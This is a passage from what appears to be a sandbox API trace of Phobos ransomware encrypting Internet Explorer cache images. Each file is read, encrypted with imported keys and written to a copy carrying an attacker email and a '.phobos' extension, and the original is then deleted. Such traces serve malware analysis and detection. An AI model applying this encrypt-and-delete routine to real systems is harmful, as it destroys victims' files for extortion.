lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0183.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0183.140] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.140] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x702, lpOverlapped=0x0) returned 1 [0183.209] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x710, dwBufLen=0x710 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x710) returned 1 [0183.209] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x710, lpOverlapped=0x0) returned 1 [0183.210] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0183.210] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.210] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.210] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.210] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.210] CryptDestroyKey (hKey=0xa32de8) returned 1 [0183.211] CloseHandle (hObject=0xb8) returned 1 [0183.211] CloseHandle (hObject=0x194) returned 1 [0183.211] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg")) returned 1 [0183.212] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.213] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=44200) returned 1 [0183.213] CloseHandle (hObject=0xb8) returned 1 [0183.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg")) returned 0x2020 [0183.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.214] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.214] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.214] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.214] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaca8, lpOverlapped=0x0) returned 1 [0183.451] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xacb0, dwBufLen=0xacb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xacb0) returned 1 [0183.452] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xacb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xacb0, lpOverlapped=0x0) returned 1 [0183.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0183.453] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.453] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.453] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.453] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.454] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.454] CloseHandle (hObject=0xb8) returned 1 [0183.454] CloseHandle (hObject=0x140) returned 1 [0183.454] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg")) returned 1 [0183.455] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.456] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1877) returned 1 [0183.456] CloseHandle (hObject=0x140) returned 1 [0183.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg")) returned 0x2020 [0183.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.456] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.456] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.457] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.457] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.457] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x755, lpOverlapped=0x0) returned 1 [0183.541] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760, dwBufLen=0x760 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x760) returned 1 [0183.541] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x760, lpOverlapped=0x0) returned 1 [0183.543] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0183.543] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.543] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.543] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0183.543] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.543] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.543] CloseHandle (hObject=0x140) returned 1 [0183.543] CloseHandle (hObject=0xb8) returned 1 [0183.543] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg")) returned 1 [0183.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.545] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7282) returned 1 [0183.545] CloseHandle (hObject=0xb8) returned 1 [0183.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg")) returned 0x2020 [0183.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.545] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.545] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.546] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.546] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.546] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c72, lpOverlapped=0x0) returned 1 [0183.722] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c80, dwBufLen=0x1c80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c80) returned 1 [0183.722] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1c80, lpOverlapped=0x0) returned 1 [0183.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0183.723] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.723] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.723] CryptDestroyKey (hKey=0xa32de8) returned 1 [0183.723] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.723] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.723] CloseHandle (hObject=0xb8) returned 1 [0183.723] CloseHandle (hObject=0x140) returned 1 [0183.723] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg")) returned 1 [0183.724] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.725] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2386) returned 1 [0183.725] CloseHandle (hObject=0x140) returned 1 [0183.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg")) returned 0x2020 [0183.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0183.726] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.726] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.728] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0183.728] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.728] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x952, lpOverlapped=0x0) returned 1 [0183.762] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x960, dwBufLen=0x960 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x960) returned 1 [0183.762] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x960, lpOverlapped=0x0) returned 1 [0183.763] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0183.763] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.764] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.764] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.764] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.764] CryptDestroyKey (hKey=0xa327e8) returned 1 [0183.764] CloseHandle (hObject=0x140) returned 1 [0183.764] CloseHandle (hObject=0xb8) returned 1 [0183.764] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg")) returned 1 [0183.765] CryptGenRandom (in: 